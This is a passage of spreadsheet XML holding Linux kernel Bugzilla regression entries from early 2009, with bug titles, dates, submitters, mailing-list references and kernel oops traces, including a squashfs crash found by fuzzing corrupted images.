    <t>udev rules for pcmcia-0.15 with nonstatic socket contains wrong path to the pcmcia-socket-startup binary</t>
  </si>
  <si>
    <t>2009-01-17 13:50 UTC</t>
  </si>
  <si>
    <t>Andrew Savchenko</t>
  </si>
  <si>
    <t>2009-10-17 12:13 UTC</t>
  </si>
  <si>
    <t>(Sorry, this is pcmciautils related bug, but as far pcmciautils is part of Linux kernel, I have no other idea where to post it using bugzilla.) Latest working kernel version: pcmcia-0.14 Earliest failing kernel version: pcmcia-0.15 Distribution: vanilla and gentoo Hardware Environment: Yenta-socket and NE2000 pcmcia network card Software Environment: pcmcia-0.15, udev-135, linux-2.6.28 Problem Description: When nonstatic socket configuration is enabled (this is required on my hardware to work properly) pcmcia-socket-startup binary is installed in /sbin/, but udev rule points to /lib/udev/. Steps to reproduce: compile with STARTUP = true and install Patch is attached, assuming pcmcia-socket-startup should be placed at /lib/udev/.</t>
  </si>
  <si>
    <t>squashfs: BUG in squashfs_read_data() on intentionally corrupted filesystems</t>
  </si>
  <si>
    <t>squashfs</t>
  </si>
  <si>
    <t>2.6.29-rc2</t>
  </si>
  <si>
    <t>2009-01-18 11:28 UTC</t>
  </si>
  <si>
    <t>2009-03-09 02:39 UTC</t>
  </si>
  <si>
    <t>Phillip Lougher</t>
  </si>
  <si>
    <t>Hardware Environment: qemu x86 Software Environment: minimal Debian sid/unstable Problem Description: On accessing an intentionally corrupted squashfs filesystem, a "BUG: unable to handle kernel paging request" happens. Unfortunately I have not been able to produce an image which reproduces this (i.e. this seems to be a heisenbug), but with a few minutes of testing I can reproduce it by randomly breaking a filesystem, mounting, accessing, unmounting and repeating. Here's a sample of the oopses produced (the last one differs a bit from the others, but I believe it is still the same bug): ------------------------------------------------------------ ***** zzuffing ***** seed 501 [ 633.616880] BUG: unable to handle kernel paging request at 00039ba8 [ 633.617561] IP: [&lt;c04e045a&gt;] zlib_inflate+0x8a3/0x1da9 [ 633.617996] *pde = 00000000 [ 633.618246] Oops: 0002 [#1] SMP DEBUG_PAGEALLOC [ 633.618535] last sysfs file: [ 633.618743] [ 633.618885] Pid: 4536, comm: find Not tainted (2.6.29-rc2 #2) [ 633.619210] EIP: 0060:[&lt;c04e045a&gt;] EFLAGS: 00000206 CPU: 0 [ 633.619526] EIP is at zlib_inflate+0x8a3/0x1da9 [ 633.619745] EAX: 00000064 EBX: 00001000 ECX: 00039ba8 EDX: c7b90000 [ 633.619974] ESI: 00000007 EDI: 00001000 EBP: c7b90050 ESP: c7b08c78 [ 633.620205] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 633.620452] Process find (pid: 4536, ti=c7b08000 task=c7ac56a0 task.ti=c7b08000) [ 633.620871] Stack: [ 633.621003] c7b90068 c7b90054 c7b902ec 00000041 0000002e 00000006 00000040 c79fda80 [ 633.621475] 00000002 0000012f c7b14ffd 00000170 00000115 c7a3f7b0 00000173 00000000 [ 633.621942] c7a22da8 c7b90000 c7b9052c c7b902ec c7b90050 c7b90068 c7b9006c c7b9052c [ 633.622471] Call Trace: [ 633.622631] [&lt;c0347649&gt;] squashfs_read_data+0x579/0x7b4 [ 633.622917] [&lt;c0347d34&gt;] squashfs_cache_get+0x29/0x2ce [ 633.623188] [&lt;c0347f64&gt;] squashfs_cache_get+0x259/0x2ce [ 633.623459] [&lt;c05c9caf&gt;] _spin_unlock+0x14/0x1c [ 633.623718] [&lt;c0275f6d&gt;] __dentry_open+0xa7/0x28c [ 633.623968] [&lt;c0348091&gt;] squashfs_read_metadata+0x64/0xd3 [ 633.624137] [&lt;c03483bc&gt;] squashfs_readdir+0x2bc/0x400 [ 633.624137] [&lt;c0283424&gt;] filldir64+0x0/0xd9 [ 633.624137] [&lt;c05c8b97&gt;] mutex_lock_killable_nested+0x260/0x2e0 [ 633.624137] [&lt;c02836b5&gt;] vfs_readdir+0x42/0x83 [ 633.624137] [&lt;c02836b5&gt;] vfs_readdir+0x42/0x83 [ 633.624137] [&lt;c0283424&gt;] filldir64+0x0/0xd9 [ 633.624137] [&lt;c02836e1&gt;] vfs_readdir+0x6e/0x83 [ 633.624137] [&lt;c028375c&gt;] sys_getdents64+0x66/0xa9 [ 633.624137] [&lt;c02030be&gt;] syscall_call+0x7/0xb [ 633.624137] Code: 8b 9c 24 84 00 00 00 8b 6c 24 7c 89 ac 24 8c 00 00 00 eb 40 8b 5c 24 7c 85 db 0f 84 b2 0b 00 00 8b 54 24 44 8b 42 3c 8b 4c 24 74 &lt;88&gt; 01 8 3 c1 01 89 4c 24 74 83 6c 24 7c 01 c7 02 12 00 00 00 8b [ 633.624137] EIP: [&lt;c04e045a&gt;] zlib_inflate+0x8a3/0x1da9 SS:ESP 0068:c7b08c78 [ 633.624195] ---[ end trace bd64820c2a86234e ]--- ------------------------------------------------------------ ------------------------------------------------------------ [ 373.380000] BUG: unable to handle kernel paging request at 00039ba8 [ 373.380000] IP: [&lt;c04e052f&gt;] zlib_inflate+0x978/0x1da9 [ 373.380000] *pde = 00000000 [ 373.380000] Oops: 0002 [#1] SMP DEBUG_PAGEALLOC [ 373.380000] last sysfs file: [ 373.380000] [ 373.380000] Pid: 2727, comm: find Not tainted (2.6.29-rc2 #2) [ 373.380000] EIP: 0060:[&lt;c04e052f&gt;] EFLAGS: 00000286 CPU: 0 [ 373.380000] EIP is at zlib_inflate+0x978/0x1da9 [ 373.380000] EAX: 00000064 EBX: 00000007 ECX: 00000005 EDX: 00000000 [ 373.380000] ESI: c7ae44d1 EDI: c7ae0000 EBP: 00039ba8 ESP: c7b8cc78 [ 373.380000] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 373.380000] Process find (pid: 2727, ti=c7b8c000 task=c7ac3020 task.ti=c7b8c000) [ 373.380000] Stack: [ 373.380000] c7ae0068 c7ae0054 c7ae02ec 00000041 00000031 00000004 00000041 c79ffa80 [ 373.380000] 00000002 00000133 c7ad8ffa 00000c80 00000119 00000000 00000c86 00000000 [ 373.380000] c7ad00a8 c7ae0000 c7ae052c c7ae02ec c7ae0050 c7ae0068 c7ae006c c7ae052c [ 373.380000] Call Trace: [ 373.380000] [&lt;c0347649&gt;] squashfs_read_data+0x579/0x7b4 [ 373.380000] [&lt;c0347d34&gt;] squashfs_cache_get+0x29/0x2ce [ 373.380000] [&lt;c0347f64&gt;] squashfs_cache_get+0x259/0x2ce [ 373.380000] [&lt;c05c9caf&gt;] _spin_unlock+0x14/0x1c [ 373.380000] [&lt;c0275f6d&gt;] __dentry_open+0xa7/0x28c [ 373.380000] [&lt;c0348091&gt;] squashfs_read_metadata+0x64/0xd3 [ 373.380000] [&lt;c03483bc&gt;] squashfs_readdir+0x2bc/0x400 [ 373.380000] [&lt;c0283424&gt;] filldir64+0x0/0xd9 [ 373.380000] [&lt;c05c8b97&gt;] mutex_lock_killable_nested+0x260/0x2e0 [ 373.380000] [&lt;c02836b5&gt;] vfs_readdir+0x42/0x83 [ 373.380000] [&lt;c02836b5&gt;] vfs_readdir+0x42/0x83 [ 373.380000] [&lt;c0283424&gt;] filldir64+0x0/0xd9 [ 373.380000] [&lt;c02836e1&gt;] vfs_readdir+0x6e/0x83 [ 373.380000] [&lt;c028375c&gt;] sys_getdents64+0x66/0xa9 [ 373.380000] [&lt;c02030be&gt;] syscall_call+0x7/0xb [ 373.380000] Code: 3c 89 c2 39 c1 77 02 89 c8 3b 44 24 7c 8b 4c 24 7c 0f 46 c8 29 4c 24 7c 29 ca 8b 7c 24 44 89 57 3c 31 d2 0f b6 04 16 8b 6c 24 74 &lt;88&gt; 44 15 00 83 c2 01 39 d1 75 ed 01 cd 89 6c 24 74 8b 44 24 44 [ 373.380000] EIP: [&lt;c04e052f&gt;] zlib_inflate+0x978/0x1da9 SS:ESP 0068:c7b8cc78 [ 373.390000] ---[ end trace fec7d22c4489f4b4 ]--- ------------------------------------------------------------ ------------------------------------------------------------ [ 247.737646] BUG: unable to handle kernel paging request at 00039ba8 [ 247.738059] IP: [&lt;c04e052f&gt;] zlib_inflate+0x978/0x1da9 [ 247.738433] *pde = 00000000 [ 247.738646] Oops: 0002 [#1] SMP DEBUG_PAGEALLOC [ 247.738909] last sysfs file: [ 247.739095] [ 247.739234] Pid: 1980, comm: find Not tainted (2.6.29-rc2 #2) [ 247.739518] EIP: 0060:[&lt;c04e052f&gt;] EFLAGS: 00000282 CPU: 0 [ 247.739789] EIP is at zlib_inflate+0x978/0x1da9 [ 247.740019] EAX: 00000000 EBX: 00000003 ECX: 00000002 EDX: 00000000 [ 247.740320] ESI: c7b826bb EDI: c7b80000 EBP: 00039ba8 ESP: c7b98c78 [ 247.740621] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 247.740907] Process find (pid: 1980, ti=c7b98000 task=c78d0000 task.ti=c7b98000) [ 247.741258] Stack: [ 247.741386] c7b80068 c7b80054 c7b802ec 00000041 00000005 00000001 00000040 c7ad0540 [ 247.741858] 00000002 0000012f c7b20ff4 00000160 00000115 c7a0b7b0 0000016c 00000000 [ 247.742342] c7a904a8 c7b80000 c7b8052c c7b802ec c7b80050 c7b80068 c7b8006c c7b8052c [ 247.742849] Call Trace: [ 247.743020] [&lt;c0347649&gt;] squashfs_read_data+0x579/0x7b4 [ 247.743313] [&lt;c0347d34&gt;] squashfs_cache_get+0x29/0x2ce [ 247.743585] [&lt;c0347f64&gt;] squashfs_cache_get+0x259/0x2ce [ 247.743897] [&lt;c05c9caf&gt;] _spin_unlock+0x14/0x1c [ 247.743939] [&lt;c0275f6d&gt;] __dentry_open+0xa7/0x28c [ 247.743939] [&lt;c0348091&gt;] squashfs_read_metadata+0x64/0xd3 [ 247.743939] [&lt;c03483bc&gt;] squashfs_readdir+0x2bc/0x400 [ 247.743939] [&lt;c0283424&gt;] filldir64+0x0/0xd9 [ 247.743939] [&lt;c05c8b97&gt;] mutex_lock_killable_nested+0x260/0x2e0 [ 247.743939] [&lt;c02836b5&gt;] vfs_readdir+0x42/0x83 [ 247.743939] [&lt;c02836b5&gt;] vfs_readdir+0x42/0x83 [ 247.743939] [&lt;c0283424&gt;] filldir64+0x0/0xd9 [ 247.743939] [&lt;c02836e1&gt;] vfs_readdir+0x6e/0x83 [ 247.743939] [&lt;c028375c&gt;] sys_getdents64+0x66/0xa9 [ 247.743939] [&lt;c02030be&gt;] syscall_call+0x7/0xb [ 247.743939] Code: 3c 89 c2 39 c1 77 02 89 c8 3b 44 24 7c 8b 4c 24 7c 0f 46 c8 29 4c 24 7c 29 ca 8b 7c 24 44 89 57 3c 31 d2 0f b6 04 16 8b 6c 24 74 &lt;88&gt; 44 1 5 00 83 c2 01 39 d1 75 ed 01 cd 89 6c 24 74 8b 44 24 44 [ 247.743939] EIP: [&lt;c04e052f&gt;] zlib_inflate+0x978/0x1da9 SS:ESP 0068:c7b98c78 [ 247.743996] ---[ end trace 8a63a42f72fc688d ]--- ------------------------------------------------------------ ------------------------------------------------------------ [ 695.650000] BUG: unable to handle kernel paging request at 00039ba8 [ 695.650000] IP: [&lt;c04e052f&gt;] zlib_inflate+0x978/0x1da9 [ 695.650000] *pde = 00000000 [ 695.660000] Oops: 0002 [#1] SMP DEBUG_PAGEALLOC [ 695.660000] last sysfs file: [ 695.660000] [ 695.660000] Pid: 4794, comm: find Not tainted (2.6.29-rc2 #2) [ 695.660000] EIP: 0060:[&lt;c04e052f&gt;] EFLAGS: 00000282 CPU: 0 [ 695.660000] EIP is at zlib_inflate+0x978/0x1da9 [ 695.660000] EAX: 00000000 EBX: 00000005 ECX: 00000001 EDX: 00000000 [ 695.660000] ESI: c7ba44ec EDI: c7ba0000 EBP: 00039ba8 ESP: c7b31aac [ 695.660000] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 695.660000] Process find (pid: 4794, ti=c7b31000 task=c78b0000 task.ti=c7b31000) [ 695.660000] Stack: [ 695.660000] c7ba0068 c7ba0054 c7ba02ec 00000031 0000000d 00000004 00000031 c7ac20e0 [ 695.660000] 00000002 0000012b c780dff2 00000d80 00000111 c7a137b0 00000d8e 00000000 [ 695.660000] c7a390a8 c7ba0000 c7ba052c c7ba02ec c7ba0050 c7ba0068 c7ba006c c7ba052c [ 695.660000] Call Trace: [ 695.660000] [&lt;c0347649&gt;] squashfs_read_data+0x579/0x7b4 [ 695.660000] [&lt;c0347d34&gt;] squashfs_cache_get+0x29/0x2ce [ 695.660000] [&lt;c0347f64&gt;] squashfs_cache_get+0x259/0x2ce [ 695.660000] [&lt;c0348091&gt;] squashfs_read_metadata+0x64/0xd3 [ 695.660000] [&lt;c03492ac&gt;] squashfs_read_inode+0x7c/0x582 [ 695.660000] [&lt;c0288787&gt;] iget_locked+0x4d/0x11c [ 695.660000] [&lt;c05c9caf&gt;] _spin_unlock+0x14/0x1c [ 695.660000] [&lt;c03497e0&gt;] squashfs_iget+0x2e/0x5e [ 695.660000] [&lt;c0349b9a&gt;] squashfs_lookup+0x38a/0x400 [ 695.660000] [&lt;c0286aab&gt;] d_alloc+0x101/0x16f [ 695.660000] [&lt;c027e8b6&gt;] do_lookup+0x18c/0x1ad [ 695.660000] [&lt;c027ff5d&gt;] __link_path_walk+0x6a8/0xd17 [ 695.660000] [&lt;c0280764&gt;] path_walk+0x4f/0xa4 [ 695.660000] [&lt;c0280888&gt;] do_path_lookup+0x81/0x159 [ 695.660000] [&lt;c027f882&gt;] getname+0x79/0xac [ 695.660000] [&lt;c0281383&gt;] user_path_at+0x41/0x72 [ 695.660000] [&lt;c027a8f5&gt;] vfs_lstat_fd+0x16/0x3d [ 695.660000] [&lt;c027a9f6&gt;] sys_fstatat64+0x41/0x55 [ 695.660000] [&lt;c028afbe&gt;] mntput_no_expire+0x18/0x10a [ 695.660000] [&lt;c0275cb1&gt;] filp_close+0x3e/0x5b [ 695.660000] [&lt;c0275d37&gt;] sys_close+0x69/0xad [ 695.660000] [&lt;c02030ca&gt;] syscall_exit+0x8/0x1a [ 695.660000] [&lt;c02030be&gt;] syscall_call+0x7/0xb [ 695.660000] Code: 3c 89 c2 39 c1 77 02 89 c8 3b 44 24 7c 8b 4c 24 7c 0f 46 c8 29 4c 24 7c 29 ca 8b 7c 24 44 89 57 3c 31 d2 0f b6 04 16 8b 6c 24 74 &lt;88&gt; 44 1 5 00 83 c2 01 39 d1 75 ed 01 cd 89 6c 24 74 8b 44 24 44 [ 695.660000] EIP: [&lt;c04e052f&gt;] zlib_inflate+0x978/0x1da9 SS:ESP 0068:c7b31aac [ 695.670000] ---[ end trace fd4ff14aac9adeac ]--- ------------------------------------------------------------ ------------------------------------------------------------ [ 375.092081] BUG: unable to handle kernel paging request at 00039ba8 [ 375.092711] IP: [&lt;c04e045a&gt;] zlib_inflate+0x8a3/0x1da9 [ 375.093092] *pde = 00000000 [ 375.093309] Oops: 0002 [#1] SMP DEBUG_PAGEALLOC [ 375.093556] last sysfs file: [ 375.093723] [ 375.093856] Pid: 2913, comm: find Not tainted (2.6.29-rc2 #2) [ 375.094125] EIP: 0060:[&lt;c04e045a&gt;] EFLAGS: 00000206 CPU: 0 [ 375.094382] EIP is at zlib_inflate+0x8a3/0x1da9 [ 375.094590] EAX: 00000051 EBX: 00001000 ECX: 00039ba8 EDX: c7bd0000 [ 375.094859] ESI: 00000005 EDI: 00001000 EBP: c7bd0050 ESP: c7bceaac [ 375.095123] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 375.095375] Process find (pid: 2913, ti=c7bce000 task=c78969e0 task.ti=c7bce000) [ 375.095690] Stack: [ 375.095800] c7bd0068 c7bd0054 c7bd02ec 00000061 00000051 00000009 00000044 c79ffd20 [ 375.096236] 00000002 0000012b c7bf3000 00000140 00000111 c0962600 00000140 00000000 [ 375.096674] c7bef0a8 c7bd0000 c7bd052c c7bd02ec c7bd0050 c7bd0068 c7bd006c c7bd052c [ 375.097139] Call Trace: [ 375.097285] [&lt;c0293700&gt;] __find_get_block+0xe/0x166 [ 375.097556] [&lt;c0254f2d&gt;] mempool_alloc+0x2b/0xe0 [ 375.097774] [&lt;c04c733b&gt;] submit_bio+0x5a/0xce [ 375.097982] [&lt;c0347649&gt;] squashfs_read_data+0x579/0x7b4 [ 375.098051] [&lt;c0347d34&gt;] squashfs_cache_get+0x29/0x2ce [ 375.098051] [&lt;c0347f64&gt;] squashfs_cache_get+0x259/0x2ce [ 375.098051] [&lt;c0348091&gt;] squashfs_read_metadata+0x64/0xd3 [ 375.098051] [&lt;c0349704&gt;] squashfs_read_inode+0x4d4/0x582 [ 375.098051] [&lt;c0288751&gt;] iget_locked+0x17/0x11c [ 375.098051] [&lt;c05c9caf&gt;] _spin_unlock+0x14/0x1c [ 375.098051] [&lt;c03497e0&gt;] squashfs_iget+0x2e/0x5e [ 375.098051] [&lt;c0349b9a&gt;] squashfs_lookup+0x38a/0x400 [ 375.098051] [&lt;c0286aab&gt;] d_alloc+0x101/0x16f [ 375.098051] [&lt;c027e8b6&gt;] do_lookup+0x18c/0x1ad [ 375.098051] [&lt;c027ff5d&gt;] __link_path_walk+0x6a8/0xd17 [ 375.098051] [&lt;c0278419&gt;] file_move+0x14/0x38 [ 375.098051] [&lt;c0280764&gt;] path_walk+0x4f/0xa4 [ 375.098051] [&lt;c0280888&gt;] do_path_lookup+0x81/0x159 [ 375.098051] [&lt;c027f882&gt;] getname+0x79/0xac [ 375.098051] [&lt;c0281383&gt;] user_path_at+0x41/0x72 [ 375.098051] [&lt;c027a8f5&gt;] vfs_lstat_fd+0x16/0x3d [ 375.098051] [&lt;c027a9f6&gt;] sys_fstatat64+0x41/0x55 [ 375.098051] [&lt;c028afbe&gt;] mntput_no_expire+0x18/0x10a [ 375.098051] [&lt;c0275cb1&gt;] filp_close+0x3e/0x5b [ 375.098051] [&lt;c0275d37&gt;] sys_close+0x69/0xad [ 375.098051] [&lt;c02030ca&gt;] syscall_exit+0x8/0x1a [ 375.098051] [&lt;c02030be&gt;] syscall_call+0x7/0xb [ 375.098051] Code: 8b 9c 24 84 00 00 00 8b 6c 24 7c 89 ac 24 8c 00 00 00 eb 40 8b 5c 24 7c 85 db 0f 84 b2 0b 00 00 8b 54 24 44 8b 42 3c 8b 4c 24 74 &lt;88&gt; 01 83 c1 01 89 4c 24 74 83 6c 24 7c 01 c7 02 12 00 00 00 8b [ 375.098051] EIP: [&lt;c04e045a&gt;] zlib_inflate+0x8a3/0x1da9 SS:ESP 0068:c7bceaac [ 375.098107] ---[ end trace c1eb1179268fa046 ]--- ------------------------------------------------------------</t>
  </si>
  <si>
    <t>Reference to inexistent struct dmi_device_id breaks the build</t>
  </si>
  <si>
    <t>2009-01-19 01:29 UTC</t>
  </si>
  <si>
    <t>2009-01-29 14:05 UTC</t>
  </si>
  <si>
    <t>i915 lockdep warning</t>
  </si>
  <si>
    <t>2009-01-19 08:42 UTC</t>
  </si>
  <si>
    <t>2009-02-23 17:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc1: i915 lockdep warning Submitter : "Brandeburg, Jesse" &lt;jesse.brandeburg@intel.com&gt; Date : 2009-01-13 23:17 References : http://marc.info/?l=linux-kernel&amp;m=123188898423532&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression: ThinkPad X61 doesn't wake up from suspend-to-ram</t>
  </si>
  <si>
    <t>2009-01-19 12:25 UTC</t>
  </si>
  <si>
    <t>Tomas Carnecky</t>
  </si>
  <si>
    <t>2009-01-27 07:54 UTC</t>
  </si>
  <si>
    <t>Commit 9ea09af3bd3090e8349ca2899ca2011bd94cda85 introduced a regression that caused the kernel to fail to suspend. The 'sleeping' LED on the laptop just keeps blinking and the laptop never shuts down. I think this was eventually fixed because with 2.6.29-rc1 and -rc2 the laptop suspends fine, but fails to resume. When I try to resume, all I see is a blinking cursor in the top left corner of the screen. I'm using acpi_sleep=s3_bios,s3_mode, suspending using a script that does: echo mem &gt; /sys/power/state.</t>
  </si>
  <si>
    <t>ACPI related kernel panic when booting 2.6.29-rc2</t>
  </si>
  <si>
    <t>2009-01-19 12:39 UTC</t>
  </si>
  <si>
    <t>2009-02-08 13:17 UTC</t>
  </si>
  <si>
    <t>Subject : ACPI related kernel panic when booting 2.6.29-rc2 Submitter : Peter Klotz &lt;peter.klotz@aon.at&gt; Date : 2009-01-17 20:47 References : http://marc.info/?l=linux-acpi&amp;m=123222565017047&amp;w=4 Handled-By : Alexey Starikovskiy &lt;aystarik@gmail.com&gt; Handled-By : Tero Roponen &lt;tero.roponen@gmail.com&gt; Patch : http://marc.info/?l=linux-acpi&amp;m=123223261225680&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Sony backlight regression from 2.6.28 to 29-rc</t>
  </si>
  <si>
    <t>2009-01-19 12:43 UTC</t>
  </si>
  <si>
    <t>2009-02-17 12:10 UTC</t>
  </si>
  <si>
    <t>Subject : Sony backlight regression from 2.6.28 to 29-rc Submitter : Norbert Preining &lt;preining@logic.at&gt; Date : 2009-01-19 8:14 References : http://marc.info/?l=linux-acpi&amp;m=123235286829512&amp;w=4 Handled-By : Mattia Dongili &lt;malattia@linux.it&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>thinkpad problems during resume</t>
  </si>
  <si>
    <t>2009-01-19 13:11 UTC</t>
  </si>
  <si>
    <t>2009-02-04 17:40 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc1: [SOLVED] thinkpad problems during resume Submitter : Christian Borntraeger &lt;borntraeger@de.ibm.com&gt; Date : 2009-01-17 15:48 References : http://marc.info/?l=linux-kernel&amp;m=123220746125479&amp;w=4 References : http://marc.info/?l=linux-kernel&amp;m=123170361827197&amp;w=4 Handled-By : Mike Travis &lt;travis@sgi.com&gt; Patch : http://lkml.org/lkml/2009/1/16/375 Patch : http://lkml.org/lkml/2009/1/16/376 Patch : http://lkml.org/lkml/2009/1/16/378 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit e39ad415ac15116df213dfa2aa2a4f1b0857af9c Author: Mike Travis &lt;travis@sgi.com&gt; Date: Sun Jan 4 05:18:10 2009 -0800 cpumask: use work_on_cpu in acpi-cpufreq.c for read_measured_perf_ctrs Signed-off-by: Mike Travis &lt;travis@sgi.com&gt; Acked-by: Rusty Russell &lt;rusty@rustcorp.com.au&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; First-Bad-Commit : e39ad415ac15116df213dfa2aa2a4f1b0857af9c</t>
  </si>
  <si>
    <t>swsusp cannot find resume device (sometimes)</t>
  </si>
  <si>
    <t>2009-01-19 13:44 UTC</t>
  </si>
  <si>
    <t>2009-02-22 09:44 UTC</t>
  </si>
  <si>
    <t>Subject : swsusp cannot find resume device (sometimes) Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2009-01-09 12:24 References : http://marc.info/?l=linux-kernel&amp;m=123150395731165&amp;w=4 Handled-By : Arjan van de Ven &lt;arjan@infradead.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123156441218358&amp;w=4 Patch : http://marc.info/?t=123156453100002&amp;r=1&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>new barrier warnings in 2.6.29-rc1</t>
  </si>
  <si>
    <t>2009-01-19 14:07 UTC</t>
  </si>
  <si>
    <t>2009-03-14 11:18 UTC</t>
  </si>
  <si>
    <t>Subject : new barrier warnings in 2.6.29-rc1 Submitter : Christoph Hellwig &lt;hch@lst.de&gt; Date : 2009-01-12 15:46 References : http://marc.info/?l=linux-kernel&amp;m=123177528217154&amp;w=4 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>OOPS and panic on 2.6.29-rc1 on xen-x86</t>
  </si>
  <si>
    <t>2009-01-19 14:12 UTC</t>
  </si>
  <si>
    <t>2009-02-03 15:07 UTC</t>
  </si>
  <si>
    <t>Subject : OOPS and panic on 2.6.29-rc1 on xen-x86 Submitter : Bryan Donlan &lt;bdonlan@gmail.com&gt; Date : 2009-01-12 17:26 References : http://marc.info/?l=linux-kernel&amp;m=123178178029065&amp;w=4 Handled-By : Nick Piggin &lt;npiggin@suse.de&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Reportedly caused by: commit e97a630eb0f5b8b380fd67504de6cedebb489003 Author: Nick Piggin &lt;npiggin@suse.de&gt; Date: Tue Jan 6 14:39:19 2009 -0800 mm: vmalloc use mutex for purge Signed-off-by: Nick Piggin &lt;npiggin@suse.de&gt; Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt; Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt; First-Bad-Commit : e97a630eb0f5b8b380fd67504de6cedebb489003</t>
  </si>
  <si>
    <t>Problem with using bluetooth adaper connected to usb port</t>
  </si>
  <si>
    <t>2009-01-19 14:21 UTC</t>
  </si>
  <si>
    <t>2009-05-17 10:21 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.29-rc1] Problem with using bluetooth adaper connected to usb port Submitter : "Maciej Rutecki" &lt;maciej.rutecki@gmail.com&gt; Date : 2009-01-13 18:34 References : http://marc.info/?l=linux-kernel&amp;m=123187185426236&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>r8169: NETDEV WATCHDOG: eth0 (r8169): transmit timed out</t>
  </si>
  <si>
    <t>2009-01-19 14:26 UTC</t>
  </si>
  <si>
    <t>2009-10-02 22:22 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28: r8169: NETDEV WATCHDOG: eth0 (r8169): transmit timed out Submitter : Justin Piszcz &lt;jpiszcz@lucidpixels.com&gt; Date : 2009-01-13 21:19 References : http://marc.info/?l=linux-kernel&amp;m=123188160811322&amp;w=4 Handled-By : Francois Romieu &lt;romieu@fr.zoreil.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pipe_read oops on sh</t>
  </si>
  <si>
    <t>2009-01-19 14:36 UTC</t>
  </si>
  <si>
    <t>2009-02-15 06:26 UTC</t>
  </si>
  <si>
    <t>Subject : pipe_read oops Submitter : Adrian McMenamin &lt;lkmladrian@gmail.com&gt; Date : 2009-01-15 9:48 References : http://marc.info/?l=linux-kernel&amp;m=123201298005600&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.29-rc1 Firefox crashing on page load</t>
  </si>
  <si>
    <t>2009-01-19 14:55 UTC</t>
  </si>
  <si>
    <t>2009-02-04 17:07 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc1 Firefox crashing on page load Submitter : Justin Madru &lt;jdm64@gawab.com&gt; Date : 2009-01-16 20:56 References : http://marc.info/?l=linux-kernel&amp;m=123213941914274&amp;w=4 Handled-By : "Justin P. Mattock" &lt;justinmattock@gmail.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Undefined symbols when CONFIG_MFD_PCF50633 is enabled</t>
  </si>
  <si>
    <t>2009-01-19 15:02 UTC</t>
  </si>
  <si>
    <t>2009-02-04 18:06 UTC</t>
  </si>
  <si>
    <t>powerpc/pci: Reserve legacy regions on PCI broke my G3</t>
  </si>
  <si>
    <t>2.6.28-git12</t>
  </si>
  <si>
    <t>2009-01-19 15:10 UTC</t>
  </si>
  <si>
    <t>2009-02-08 16:38 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.28-git12: "powerpc/pci: Reserve legacy regions on PCI" broke my G3 Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2009-01-17 22:46 References : http://marc.info/?l=linux-kernel&amp;m=123223247325452&amp;w=4 Handled-By : Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit c1f343028d35ba4e88cd4a3c44e0d8b8a84264ee Author: Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; Date: Tue Nov 11 17:45:52 2008 +0000 powerpc/pci: Reserve legacy regions on PCI Signed-off-by: Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; First-Bad-Commit : c1f343028d35ba4e88cd4a3c44e0d8b8a84264ee</t>
  </si>
  <si>
    <t>lockdep report. fb_mmap vs sys_mmap2</t>
  </si>
  <si>
    <t>2009-01-19 15:16 UTC</t>
  </si>
  <si>
    <t>2009-02-08 13:15 UTC</t>
  </si>
  <si>
    <t>Subject : lockdep report. fb_mmap vs sys_mmap2 Submitter : Dave Jones &lt;davej@redhat.com&gt; Date : 2009-01-17 18:19 References : http://lkml.org/lkml/2009/1/17/176 Handled-By : Andrea Righi &lt;righi.andrea@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123231032115956&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.29-rc2 dies on startup</t>
  </si>
  <si>
    <t>2009-01-19 15:20 UTC</t>
  </si>
  <si>
    <t>2009-02-16 13:12 UTC</t>
  </si>
  <si>
